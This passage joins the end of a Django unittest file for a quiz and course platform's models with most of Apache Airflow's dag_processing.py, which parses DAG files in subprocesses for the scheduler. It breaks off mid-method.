self.stdout_based_testcase = StdIOBasedTestCase(
question=self.question2,
expected_output='Hello World',
type='standardtestcase'
)
self.assertion_testcase.save()
self.stdout_based_testcase.save()
answer_data = {'metadata': { 'user_answer': 'demo_answer',
'language': 'python',
'partial_grading': False
},
'test_case_data': [{'test_case': 'assert myfunc(12, 13) == 15',
'test_case_type': 'standardtestcase',
'test_case_args': "",
'weight': 1.0
}]
}
self.answer_data_json = json.dumps(answer_data)
def test_assertion_testcase(self):
""" Test question """
self.assertEqual(self.assertion_testcase.question, self.question1)
self.assertEqual(self.assertion_testcase.test_case,
'assert myfunc(12, 13) == 15')
def test_stdout_based_testcase(self):
""" Test question """
self.assertEqual(self.stdout_based_testcase.question, self.question2)
self.assertEqual(self.stdout_based_testcase.expected_output,
'Hello World'
)
def test_consolidate_answer_data(self):
""" Test consolidate answer data model method """
result = self.question1.consolidate_answer_data(
user_answer="demo_answer"
)
actual_data = json.loads(result)
exp_data = json.loads(self.answer_data_json)
self.assertEqual(actual_data['metadata']['user_answer'], exp_data['metadata']['user_answer'])
self.assertEqual(actual_data['test_case_data'], exp_data['test_case_data'])
class AssignmentUploadTestCases(unittest.TestCase):
def setUp(self):
self.user1 = User.objects.get(username="creator")
self.user1.first_name = "demo"
self.user1.last_name = "user"
self.user1.save()
self.user2 = User.objects.get(username="demo_user3")
self.user2.first_name = "demo"
self.user2.last_name = "user3"
self.user2.save()
self.quiz = Quiz.objects.get(description="demo quiz 1")
self.questionpaper = QuestionPaper.objects.create(quiz=self.quiz,
total_marks=0.0,
shuffle_questions=True
)
self.question = Question.objects.create(summary='Assignment',
language='Python',
type='upload',
active=True,
description='Upload a file',
points=1.0,
snippet='',
user=self.user1
)
self.questionpaper.fixed_question_order = "{0}".format(self.question.id)
self.questionpaper.fixed_questions.add(self.question)
file_path1 = os.path.join(tempfile.gettempdir(), "upload1.txt")
file_path2 = os.path.join(tempfile.gettempdir(), "upload2.txt")
self.assignment1 = AssignmentUpload.objects.create(user=self.user1,
assignmentQuestion=self.question, assignmentFile=file_path1,
question_paper=self.questionpaper
)
self.assignment2 = AssignmentUpload.objects.create(user=self.user2,
assignmentQuestion=self.question, assignmentFile=file_path2,
question_paper=self.questionpaper
)
def test_get_assignments_for_user_files(self):
assignment_files, file_name = AssignmentUpload.objects.get_assignments(
self.questionpaper, self.question.id,
self.user1.id
)
self.assertIn("upload1.txt", assignment_files[0].assignmentFile.name)
self.assertEqual(assignment_files[0].user, self.user1)
actual_file_name = self.user1.get_full_name().replace(" ", "_")
file_name = file_name.replace(" ", "_")
self.assertEqual(file_name, actual_file_name)
def test_get_assignments_for_quiz_files(self):
assignment_files, file_name = AssignmentUpload.objects.get_assignments(
self.questionpaper
)
files = [os.path.basename(file.assignmentFile.name)
for file in assignment_files]
question_papers = [file.question_paper for file in assignment_files]
self.assertIn("upload1.txt", files)
self.assertIn("upload2.txt", files)
self.assertEqual(question_papers[0].quiz, self.questionpaper.quiz)
actual_file_name = self.quiz.description.replace(" ", "_")
file_name = file_name.replace(" ", "_")
self.assertIn(actual_file_name, file_name)
class CourseStatusTestCases(unittest.TestCase):
def setUp(self):
user = User.objects.get(username='creator')
self.course = Course.objects.create(name="Demo Course", creator=user,
enrollment="Enroll Request")
self.module = LearningModule.objects.create(name='M1', creator=user,
description='module one')
self.quiz1 = Quiz.objects.create(time_between_attempts=0, weightage=50,
description='qz1')
self.quiz2 = Quiz.objects.create(time_between_attempts=0, weightage=100,
description='qz2')
question = Question.objects.first()
self.qpaper1 = QuestionPaper.objects.create(quiz=self.quiz1)
self.qpaper2 = QuestionPaper.objects.create(quiz=self.quiz2)
self.qpaper1.fixed_questions.add(question)
self.qpaper2.fixed_questions.add(question)
self.qpaper1.update_total_marks()
self.qpaper2.update_total_marks()
self.qpaper1.save()
self.qpaper2.save()
self.unit_1_quiz = LearningUnit.objects.create(order=1, type='quiz',
quiz=self.quiz1)
self.unit_2_quiz = LearningUnit.objects.create(order=2, type='quiz',
quiz=self.quiz2)
self.module.learning_unit.add(self.unit_1_quiz)
self.module.learning_unit.add(self.unit_2_quiz)
self.module.save()
self.course.learning_module.add(self.module)
student = User.objects.get(username='course_user')
self.course.students.add(student)
self.course.save()
attempt = 1
ip = '127.0.0.1'
self.answerpaper1 = self.qpaper1.make_answerpaper(student, ip, attempt,
self.course.id)
self.answerpaper2 = self.qpaper2.make_answerpaper(student, ip, attempt,
self.course.id)
self.course_status = CourseStatus.objects.create(course=self.course,
user=student)
def tearDown(self):
self.course_status.delete()
self.answerpaper1.delete()
self.answerpaper2.delete()
self.qpaper1.delete()
self.qpaper2.delete()
self.quiz1.delete()
self.quiz2.delete()
self.unit_1_quiz.delete()
self.unit_2_quiz.delete()
self.module.delete()
self.course.delete()
def test_course_is_complete(self):
# When
self.course_status.completed_units.add(self.unit_1_quiz)
# Then
self.assertFalse(self.course_status.is_course_complete())
# When
self.course_status.completed_units.add(self.unit_2_quiz)
# Then
self.assertTrue(self.course_status.is_course_complete())
# Given
self.answerpaper1.marks_obtained = 1
self.answerpaper1.save()
self.answerpaper2.marks_obtained = 0
self.answerpaper2.save()
# When
self.course_status.calculate_percentage()
# Then
self.assertEqual(round(self.course_status.percentage, 2), 33.33)
# When
self.course_status.set_grade()
# Then
self.assertEqual(self.course_status.get_grade(), 'F')
# Given
self.answerpaper1.marks_obtained = 0
self.answerpaper1.save()
self.answerpaper2.marks_obtained = 1
self.answerpaper2.save()
# When
self.course_status.calculate_percentage()
# Then
self.assertEqual(round(self.course_status.percentage, 2), 66.67)
# When
self.course_status.set_grade()
# Then
self.assertEqual(self.course_status.get_grade(), 'B')
# Test get course grade after completion
self.assertEqual(self.course.get_grade(self.answerpaper1.user), 'B')
|
dag_processing.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Processes DAGs."""
import enum
import importlib
import logging
import multiprocessing
import os
import signal
import sys
import time
from abc import ABCMeta, abstractmethod
from datetime import datetime, timedelta
from importlib import import_module
from typing import Any, Callable, Dict, KeysView, List, NamedTuple, Optional, Tuple
import psutil
from setproctitle import setproctitle # pylint: disable=no-name-in-module
from sqlalchemy import or_
from tabulate import tabulate
import airflow.models
from airflow.configuration import conf
from airflow.dag.base_dag import BaseDag, BaseDagBag
from airflow.exceptions import AirflowException
from airflow.jobs.local_task_job import LocalTaskJob as LJ
from airflow.models import Connection, errors
from airflow.models.taskinstance import SimpleTaskInstance
from airflow.settings import STORE_SERIALIZED_DAGS
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.file import list_py_file_paths
from airflow.utils.helpers import reap_process_group
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.session import provide_session
from airflow.utils.state import State
class SimpleDag(BaseDag):
"""
A simplified representation of a DAG that contains all attributes
required for instantiating and scheduling its associated tasks.
:param dag: the DAG
:type dag: airflow.models.DAG
:param pickle_id: ID associated with the pickled version of this DAG.
:type pickle_id: unicode
"""
def __init__(self, dag, pickle_id: Optional[str] = None):
self._dag_id: str = dag.dag_id
self._task_ids: List[str] = [task.task_id for task in dag.tasks]
self._full_filepath: str = dag.full_filepath
self._concurrency: int = dag.concurrency
self._pickle_id: Optional[str] = pickle_id
self._task_special_args: Dict[str, Any] = {}
for task in dag.tasks:
special_args = {}
if task.task_concurrency is not None:
special_args['task_concurrency'] = task.task_concurrency
if special_args:
self._task_special_args[task.task_id] = special_args
@property
def dag_id(self) -> str:
"""
:return: the DAG ID
:rtype: unicode
"""
return self._dag_id
@property
def task_ids(self) -> List[str]:
"""
:return: A list of task IDs that are in this DAG
:rtype: list[unicode]
"""
return self._task_ids
@property
def full_filepath(self) -> str:
"""
:return: The absolute path to the file that contains this DAG's definition
:rtype: unicode
"""
return self._full_filepath
@property
def concurrency(self) -> int:
"""
:return: maximum number of tasks that can run simultaneously from this DAG
:rtype: int
"""
return self._concurrency
@property
def pickle_id(self) -> Optional[str]: # pylint: disable=invalid-overridden-method
"""
:return: The pickle ID for this DAG, if it has one. Otherwise None.
:rtype: unicode
"""
return self._pickle_id
@property
def task_special_args(self) -> Dict[str, Any]:
"""Special arguments of the task."""
return self._task_special_args
def get_task_special_arg(self, task_id: str, special_arg_name: str):
"""Retrieve special arguments of the task."""
if task_id in self._task_special_args and special_arg_name in self._task_special_args[task_id]:
return self._task_special_args[task_id][special_arg_name]
else:
return None
class SimpleDagBag(BaseDagBag):
"""
A collection of SimpleDag objects with some convenience methods.
"""
def __init__(self, simple_dags: List[SimpleDag]):
"""
Constructor.
:param simple_dags: SimpleDag objects that should be in this
:type list(airflow.utils.dag_processing.SimpleDag)
"""
self.simple_dags = simple_dags
self.dag_id_to_simple_dag: Dict[str, SimpleDag] = {}
for simple_dag in simple_dags:
self.dag_id_to_simple_dag[simple_dag.dag_id] = simple_dag
@property
def dag_ids(self) -> KeysView[str]:
"""
:return: IDs of all the DAGs in this
:rtype: list[unicode]
"""
return self.dag_id_to_simple_dag.keys()
def get_dag(self, dag_id: str) -> SimpleDag:
"""
:param dag_id: DAG ID
:type dag_id: unicode
:return: if the given DAG ID exists in the bag, return the BaseDag
corresponding to that ID. Otherwise, throw an Exception
:rtype: airflow.utils.dag_processing.SimpleDag
"""
if dag_id not in self.dag_id_to_simple_dag:
raise AirflowException("Unknown DAG ID {}".format(dag_id))
return self.dag_id_to_simple_dag[dag_id]
class AbstractDagFileProcessorProcess(metaclass=ABCMeta):
"""
Processes a DAG file. See SchedulerJob.process_file() for more details.
"""
@abstractmethod
def start(self):
"""
Launch the process to process the file
"""
raise NotImplementedError()
@abstractmethod
def terminate(self, sigkill: bool = False):
"""
Terminate (and then kill) the process launched to process the file
"""
raise NotImplementedError()
@property
@abstractmethod
def pid(self) -> int:
"""
:return: the PID of the process launched to process the given file
"""
raise NotImplementedError()
@property
@abstractmethod
def exit_code(self) -> int:
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
raise NotImplementedError()
@property
@abstractmethod
def done(self) -> bool:
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
raise NotImplementedError()
@property
@abstractmethod
def result(self) -> Tuple[List[SimpleDag], int]:
"""
A list of simple dags found, and the number of import errors
:return: result of running SchedulerJob.process_file()
:rtype: tuple[list[airflow.utils.dag_processing.SimpleDag], int]
"""
raise NotImplementedError()
@property
@abstractmethod
def start_time(self):
"""
:return: When this started to process the file
:rtype: datetime
"""
raise NotImplementedError()
@property
@abstractmethod
def file_path(self):
"""
:return: the path to the file that this is processing
:rtype: unicode
"""
raise NotImplementedError()
class DagParsingStat(NamedTuple):
"""Information on processing progress"""
file_paths: List[str]
done: bool
all_files_processed: bool
class DagFileStat(NamedTuple):
"""Information about single processing of one file"""
num_dags: int
import_errors: int
last_finish_time: datetime
last_duration: float
run_count: int
class DagParsingSignal(enum.Enum):
"""All signals sent to parser."""
AGENT_HEARTBEAT = 'agent_heartbeat'
TERMINATE_MANAGER = 'terminate_manager'
END_MANAGER = 'end_manager'
class DagFileProcessorAgent(LoggingMixin):
"""
Agent for DAG file processing. It is responsible for all DAG parsing
related jobs in scheduler process. Mainly it can spin up DagFileProcessorManager
in a subprocess, collect DAG parsing results from it and communicate
signal/DAG parsing stat with it.
This class runs in the main `airflow scheduler` process.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: str
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_factory: function that creates processors for DAG
definition files. Arguments are (dag_definition_path, log_file_path)
:type processor_factory: (str, str, list) -> (AbstractDagFileProcessorProcess)
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param async_mode: Whether to start agent in async mode
:type async_mode: bool
"""
def __init__(self,
dag_directory,
max_runs,
processor_factory,
processor_timeout,
async_mode):
self._file_path_queue = []
self._dag_directory = dag_directory
self._max_runs = max_runs
self._processor_factory = processor_factory
self._processor_timeout = processor_timeout
self._async_mode = async_mode
# Map from file path to the processor
self._processors = {}
# Pipe for communicating signals
self._process = None
self._done = False
# Initialized as true so we do not deactivate w/o any actual DAG parsing.
self._all_files_processed = True
self._parent_signal_conn = None
self._collected_dag_buffer = []
def start(self):
"""
Launch DagFileProcessorManager processor and start DAG parsing loop in manager.
"""
self._parent_signal_conn, child_signal_conn = multiprocessing.Pipe()
self._process = multiprocessing.Process(
target=type(self)._run_processor_manager,
args=(
self._dag_directory,
self._max_runs,
self._processor_factory,
self._processor_timeout,
child_signal_conn,
self._async_mode,
)
)
self._process.start()
self.log.info("Launched DagFileProcessorManager with pid: %s", self._process.pid)
def heartbeat(self):
"""
Should only be used when launched DAG file processor manager in sync mode.
Send agent heartbeat signal to the manager, requesting that it runs one
processing "loop".
Call wait_until_finished to ensure that any launched processors have
finished before continuing
"""
if not self._process.is_alive():
return
try:
self._parent_signal_conn.send(DagParsingSignal.AGENT_HEARTBEAT)
except ConnectionError:
# If this died cos of an error then we will noticed and restarted
# when harvest_simple_dags calls _heartbeat_manager.
pass
def wait_until_finished(self):
"""Waits until DAG parsing is finished."""
while self._parent_signal_conn.poll(timeout=None):
try:
result = self._parent_signal_conn.recv()
except EOFError:
break
self._process_message(result)
if isinstance(result, DagParsingStat):
# In sync mode we don't send this message from the Manager
# until all the running processors have finished
return
@staticmethod
def _run_processor_manager(dag_directory,
max_runs,
processor_factory,
processor_timeout,
signal_conn,
async_mode):
# Make this process start as a new process group - that makes it easy
# to kill all sub-process of this at the OS-level, rather than having
# to iterate the child processes
os.setpgid(0, 0)
setproctitle("airflow scheduler -- DagFileProcessorManager")
# Reload configurations and settings to avoid collision with parent process.
# Because this process may need custom configurations that cannot be shared,
# e.g. RotatingFileHandler. And it can cause connection corruption if we
# do not recreate the SQLA connection pool.
os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER'] = 'True'
os.environ['AIRFLOW__LOGGING__COLORED_CONSOLE_LOG'] = 'False'
# Replicating the behavior of how logging module was loaded
# in logging_config.py
importlib.reload(import_module(airflow.settings.LOGGING_CLASS_PATH.rsplit('.', 1)[0]))
importlib.reload(airflow.settings)
airflow.settings.initialize()
del os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER']
processor_manager = DagFileProcessorManager(dag_directory,
max_runs,
processor_factory,
processor_timeout,
signal_conn,
async_mode)
processor_manager.start()
def harvest_simple_dags(self):
"""
Harvest DAG parsing results from result queue and sync metadata from stat queue.
:return: List of parsing result in SimpleDag format.
"""
# Receive any pending messages before checking if the process has exited.
while self._parent_signal_conn.poll(timeout=0.01):
try:
result = self._parent_signal_conn.recv()
except (EOFError, ConnectionError):
break
self._process_message(result)
simple_dags = self._collected_dag_buffer
self._collected_dag_buffer = []
# If it died unexpectedly restart the manager process
self._heartbeat_manager()
return simple_dags
def _process_message(self, message):
self.log.debug("Received message of type %s", type(message).__name__)
if isinstance(message, DagParsingStat):
self._sync_metadata(message)
else:
self._collected_dag_buffer.append(message)
def _heartbeat_manager(self):
"""
Heartbeat DAG file processor and restart it if we are not done.
"""
if self._process and not self._process.is_alive():
self._process.join(timeout=0)
if not self.done:
self.log.warning(
"DagFileProcessorManager (PID=%d) exited with exit code %d - re-launching",
self._process.pid, self._process.exitcode
)
self.start()
def _sync_metadata(self, stat):
"""
Sync metadata from stat queue and only keep the latest stat.
"""
self._done = stat.done
self._all_files_processed = stat.all_files_processed
@property
def done(self):
"""
Has DagFileProcessorManager ended?
"""
return self._done
@property
def all_files_processed(self):
"""
Have all files been processed at least once?
"""
return self._all_files_processed
def terminate(self):
"""
Send termination signal to DAG parsing processor manager
and expect it to terminate all DAG file processors.
"""
if self._process and self._process.is_alive():
self.log.info("Sending termination message to manager.")
try:
self._parent_signal_conn.send(DagParsingSignal.TERMINATE_MANAGER)
except ConnectionError:
pass
def end(self):
"""
Terminate (and then kill) the manager process launched.
:return:
"""
if not self._process:
self.log.warning('Ending without manager process.')
return
reap_process_group(self._process.pid, log=self.log)
self._parent_signal_conn.close()
class DagFileProcessorManager(LoggingMixin): # pylint: disable=too-many-instance-attributes
"""
Given a list of DAG definition files, this kicks off several processors
in parallel to process them and put the results to a multiprocessing.Queue
for DagFileProcessorAgent to harvest. The parallelism is limited and as the
processors finish, more are launched. The files are processed over and
over again, but no more often than the specified interval.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: unicode
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_factory: function that creates processors for DAG
definition files. Arguments are (dag_definition_path)
:type processor_factory: (unicode, unicode, list) -> (AbstractDagFileProcessorProcess)
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param signal_conn: connection to communicate signal with processor agent.
:type signal_conn: multiprocessing.connection.Connection
:param async_mode: whether to start the manager in async mode
:type async_mode: bool
"""
def __init__(self,
dag_directory: str,
max_runs: int,
processor_factory: Callable[[str, List[Any]], AbstractDagFileProcessorProcess],
processor_timeout: timedelta,
signal_conn: Connection,
async_mode: bool = True):
self._file_paths: List[str] = []
self._file_path_queue: List[str] = []
self._dag_directory = dag_directory
self._max_runs = max_runs
self._processor_factory = processor_factory
self._signal_conn = signal_conn
self._async_mode = async_mode
self._parsing_start_time: Optional[datetime] = None
self._parallelism = conf.getint('scheduler', 'max_threads')
if 'sqlite' in conf.get('core', 'sql_alchemy_conn') and self._parallelism > 1:
self.log.warning(
"Because we cannot use more than 1 thread (max_threads = "
"%d ) when using sqlite. So we set parallelism to 1.", self._parallelism
)
self._parallelism = 1
# Parse and schedule each file no faster than this interval.
self._file_process_interval = conf.getint('scheduler',
'min_file_process_interval')
# How often to print out DAG file processing stats to the log. Default to
# 30 seconds.
self.print_stats_interval = conf.getint('scheduler',
'print_stats_interval')
# How many seconds do we wait for tasks to heartbeat before mark them as zombies.
self._zombie_threshold_secs = (
conf.getint('scheduler', 'scheduler_zombie_task_threshold'))
# Map from file path to the processor
self._processors: Dict[str, AbstractDagFileProcessorProcess] = {}
self._num_run = 0
# Map from file path to stats about the file
self._file_stats: Dict[str, DagFileStat] = {}
self._last_zombie_query_time = None
# Last time that the DAG dir was traversed to look for files
self.last_dag_dir_refresh_time = timezone.make_aware(datetime.fromtimestamp(0))
# Last time stats were printed
self.last_stat_print_time = timezone.datetime(2000, 1, 1)
# TODO: Remove magic number
self._zombie_query_interval = 10
self._zombies: List[SimpleTaskInstance] = []
# How long to wait before timing out a process to parse a DAG file
self._processor_timeout = processor_timeout
# How often to scan the DAGs directory for new files. Default to 5 minutes.
self.dag_dir_list_interval = conf.getint('scheduler',
'dag_dir_list_interval')
self._log = logging.getLogger('airflow.processor_manager')
def register_exit_signals(self):
"""
Register signals that stop child processes
"""
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame): # pylint: disable=unused-argument
"""
Helper method to clean up DAG file processors to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
self.terminate()
self.end()
self.log.debug("Finished terminating DAG processors.")
sys.exit(os.EX_OK)
def start(self):
"""
Use multiple processes to parse and generate tasks for the
DAGs in parallel. By processing them in separate processes,
we can get parallelism and isolation from potentially harmful
user code.
"""
self.register_exit_signals()
# Start a new process group
os.setpgid(0, 0)
self.log.info("Processing files using up to %s processes at a time ", self._parallelism)
self.log.info("Process each file at most once every %s seconds", self._file_process_interval)
self.log.info(
"Checking for new files in %s every %s seconds", self._dag_directory, self.dag_dir_list_interval
)
# In sync mode we want timeout=None -- wait forever until a message is received
if self._async_mode:
poll_time = 0.0
else:
poll_time = None
# Used to track how long it takes us to get once around every file in the DAG folder.
self._parsing_start_time = timezone.utcnow()
while True:
loop_start_time = time.time()
# pylint: disable=no-else-break
if self._signal_conn.poll(poll_time):
agent_signal = self._signal_conn.recv()
self.log.debug("Received %s signal from DagFileProcessorAgent", agent_signal)
if agent_signal == DagParsingSignal.TERMINATE_MANAGER:
self.terminate()
break
elif agent_signal == DagParsingSignal.END_MANAGER:
self.end()
sys.exit(os.EX_OK)
elif agent_signal == DagParsingSignal.AGENT_HEARTBEAT:
# continue the loop to parse dags
pass
elif not self._async_mode:
# In "sync" mode we don't want to parse the DAGs until we
# are told to (as that would open another connection to the
# SQLite DB which isn't a good practice
continue
# pylint: enable=no-else-break
self._refresh_dag_dir()
self._find_zombies() # pylint: disable=no-value-for-parameter
self._kill_timed_out_processors()
simple_dags = self.collect_results()
# Generate more file paths to process if we processed all the files
# already.
if not self._file_path_queue:
self.emit_metrics()
self.prepare_file_path_queue()
self.start_new_processes()
# Update number of loop iteration.
self._num_run += 1
for simple_dag in simple_dags:
self._signal_conn.send(simple_dag)
if not self._async_mode:
self.log.debug(
"Waiting for processors to finish since we're using sqlite")
# Wait until the running DAG processors are finished before
# sending a DagParsingStat message back. This means the Agent
# can tell we've got to the end of this iteration when it sees
# this type of message
self.wait_until_finished()
# Collect anything else that has finished, but don't kick off any more processors
simple_dags = self.collect_results()
for simple_dag in simple_dags:
self._signal_conn.send(simple_dag)
self._print_stat()
all_files_processed = all(self.get_last_finish_time(x) is not None for x in self.file_paths)
max_runs_reached = self.max_runs_reached()
dag_parsing_stat = DagParsingStat(self._file_paths,
max_runs_reached,
all_files_processed,
)
self._signal_conn.send(dag_parsing_stat)
if max_runs_reached:
self.log.info("Exiting dag parsing loop as all files "
"have been processed %s times", self._max_runs)
break
if self._async_mode:
loop_duration = time.time() - loop_start_time
if loop_duration < 1:
poll_time = 1 - loop_duration
else:
poll_time = 0.0
def _refresh_dag_dir(self):
"""
Refresh file paths from dag dir if we haven't done it for too long.
"""
now = timezone.utcnow()
elapsed_time_since_refresh = (now - self.last_dag_dir_refresh_time).total_seconds()
if elapsed_time_since_refresh > self.dag_dir_list_interval:
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self._dag_directory)
self._file_paths = list_py_file_paths(self._dag_directory)
self.last_dag_dir_refresh_time = now
self.log.info("There are %s files in %s", len(self._file_paths), self._dag_directory)
self.set_file_paths(self._file_paths)
# noinspection PyBroadException
try:
self.log.debug("Removing old import errors")
self.clear_nonexistent_import_errors() # pylint: disable=no-value-for-parameter
except Exception: # pylint: disable=broad-except
self.log.exception("Error removing old import errors")
if STORE_SERIALIZED_DAGS:
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.dag import DagModel
SerializedDagModel.remove_deleted_dags(self._file_paths)
DagModel.deactivate_deleted_dags(self._file_paths)
def _print_stat(self):
"""
Occasionally print out stats about how fast the files are getting processed
"""
if 0 < self.print_stats_interval < (
timezone.utcnow() - self.last_stat_print_time).total_seconds():
if self._file_paths:
self._log_file_processing_stats(self._file_paths)
self.last_stat_print_time = timezone.utcnow()
@provide_session
def clear_nonexistent_import_errors(self, session):
"""
Clears import errors for files that no longer exist.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
"""
query = session.query(errors.ImportError)
if self._file_paths:
query = query.filter(
~errors.ImportError.filename.in_(self._file_paths)
)
query.delete(synchronize_session='fetch')
session.commit()
def _log_file_processing_stats(self, known_file_paths):
"""
Print out stats about how files are getting processed.
:param known_file_paths: a list of file paths that may contain Airflow
DAG definitions
:type known_file_paths: list[unicode]
:return: None
"""
# File Path: Path to the file containing the DAG definition
# PID: PID associated with the process that's processing the file. May
# be empty.
# Runtime: If the process is currently running, how long it's been
# running for in seconds.
# Last Runtime: If the process ran before, how long did it take to
# finish in seconds
# Last Run: When the file finished processing in the previous run.
headers = ["File Path",
"PID",
"Runtime",
"# DAGs",
"# Errors",
"Last Runtime",
"Last Run"]
rows = []
now = timezone.utcnow()
for file_path in known_file_paths:
last_runtime = self.get_last_runtime(file_path)
num_dags = self.get_last_dag_count(file_path)
num_errors = self.get_last_error_count(file_path)
file_name = os.path.basename(file_path)
file_name = os.path.splitext(file_name)[0].replace(os.sep, '.')
processor_pid = self.get_pid(file_path)
processor_start_time = self.get_start_time(file_path)
runtime = ((now - processor_start_time) if processor_start_time else None)
last_run = self.get_last_finish_time(file_path)
if last_run:
seconds_ago = (now - last_run).total_seconds()
Stats.gauge('dag_processing.last_run.seconds_ago.{}'.format(file_name), seconds_ago)
if runtime:
Stats.timing('dag_processing.last_duration.{}'.format(file_name), runtime)
# TODO: Remove before Airflow 2.0
Stats.timing('dag_processing.last_runtime.{}'.format(file_name), runtime)
rows.append((file_path,
processor_pid,
runtime,
num_dags,
num_errors,
last_runtime,
last_run))
# Sort by longest last runtime. (Can't sort None values in python3)
rows = sorted(rows, key=lambda x: x[3] or 0.0)
formatted_rows = []
for file_path, pid, runtime, num_dags, num_errors, last_runtime, last_run in rows:
formatted_rows.append((file_path,
pid,
"{:.2f}s".format(runtime.total_seconds()) if runtime else None,
num_dags,
num_errors,
"{:.2f}s".format(last_runtime) if last_runtime else None,
last_run.strftime("%Y-%m-%dT%H:%M:%S") if last_run else None
))
log_str = ("\n" +
"=" * 80 +
"\n" +
"DAG File Processing Stats\n\n" +
tabulate(formatted_rows, headers=headers) +
"\n" +
"=" * 80)
self.log.info(log_str)
def get_pid(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the PID of the process processing the given file or None if
the specified file is not being processed
:rtype: int
"""
if file_path in self._processors:
return self._processors[file_path].pid
return None
def get_all_pids(self):
"""
:return: a list of the PIDs for the processors that are running
:rtype: List[int]
"""
return [x.pid for x in self._processors.values()]
def get_last_runtime(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the runtime (in seconds) of the process of the last run, or
None if the file was never processed.
:rtype: float
"""
stat = self._file_stats.get(file_path)
return stat.last_duration if stat else None
def get_last_dag_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the number of dags loaded from that file, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.num_dags if stat else None
def get_last_error_count(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the number of import errors from processing, or None if the file
was never processed.
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.import_errors if stat else None
def get_last_finish_time(self, file_path):
"""
:param file_path: the path to the file that was processed
:type file_path: unicode
:return: the finish time of the process of the last run, or None if the
file was never processed.
:rtype: datetime
"""
stat = self._file_stats.get(file_path)
return stat.last_finish_time if stat else None
def get_start_time(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the start time of the process that's processing the
specified file or None if the file is not currently being processed
:rtype: datetime
"""
if file_path in self._processors:
return self._processors[file_path].start_time
return None
def get_run_count(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the number of times the given file has been parsed
:rtype: int
"""
stat = self._file_stats.get(file_path)
return stat.run_count if stat else 0
def set_file_paths(self, new_file_paths):
"""
Update this with a new set of paths to DAG definition files.
:param new_file_paths: list of paths to DAG definition files
:type new_file_paths: list[unicode]
:return: None
"""
self._file_paths = new_file_paths
self._file_path_queue = [x for x in self._file_path_queue
if x in new_file_paths]
# Stop processors that are working on deleted files
filtered_processors = {}
for file_path, processor in self._processors.items():
if file_path in new_file_paths:
filtered_processors[file_path] = processor
else:
self.log.warning("Stopping processor for %s", file_path)
Stats.decr('dag_processing.processes')
processor.terminate()
self._file_stats.pop(file_path)
self._processors = filtered_processors
def wait_until_finished(self):
"""
Sleeps until all the processors are done.
"""
for processor in self._processors.values():
while not processor.done:
time.sleep(0.1)
def collect_results(self):
"""
Collect the result from any finished DAG processors
:return: a list of SimpleDags that were produced by processors that
have finished since the last time this was called
:rtype: list[airflow.utils.dag_processing.SimpleDag]
"""
finished_processors: Dict[str, AbstractDagFileProcessorProcess] = {}
running_processors: Dict[str, AbstractDagFileProcessorProcess] = {}
for file_path, processor in self._processors.items():
if processor.done:
self.log.debug("Processor for %s finished", file_path)
Stats.decr('dag_processing.processes')
now = timezone.utcnow()
finished_processors[file_path] = processor
stat = DagFileStat(
len(processor.result[0]) if processor.result is not None else 0,
processor.result[1] if processor.result is not None else -1,
now,
(now - processor.start_time).total_seconds(),
self.get_run_count(file_path) + 1,
)
self._file_stats[file_path] = stat
else:
running_processors[file_path] = processor
self._processors = running_processors
self.log.debug("%s/%s DAG parsing processes running",
len(self._processors), self._parallelism)
self.log.debug("%s file paths queued for processing",
len(self._file_path_queue))
# Collect all the DAGs that were found in the processed files
simple_dags = []
for file_path, processor in finished_processors.items():
if processor.result is None:
self.log.error(
"Processor for %s exited with return code %s.",
processor.file_path, processor.exit_code
)
else:
for simple_dag in processor.result[0]:
simple_dags.append(simple_dag)
return simple_dags
def start_new_processes(self):
""""
Start more processors if we have enough slots and files to process
"""
while self._parallelism - len(self._processors) > 0 and self._file_path_queue:
file_path = self._file_path_queue.pop(0)
processor = self._processor_factory(file_path, self._zombies)
Stats.incr('dag_processing.processes')
processor.start()
self.log.debug(
"Started a process (PID: %s) to generate tasks for %s",
processor.pid, file_path
)
self._processors[file_path] = processor
def prepare_file_path_queue(self):
"""
Generate more file paths to process. Result are saved in _file_path_queue.
"""
self._parsing_start_time = timezone.utcnow()
# If the file path is already being processed, or if a file was
# processed recently, wait until the next batch
file_paths_in_progress = self._processors.keys()
now = timezone.utcnow()
file_paths_recently_processed = []
for file_path in self._file_paths:
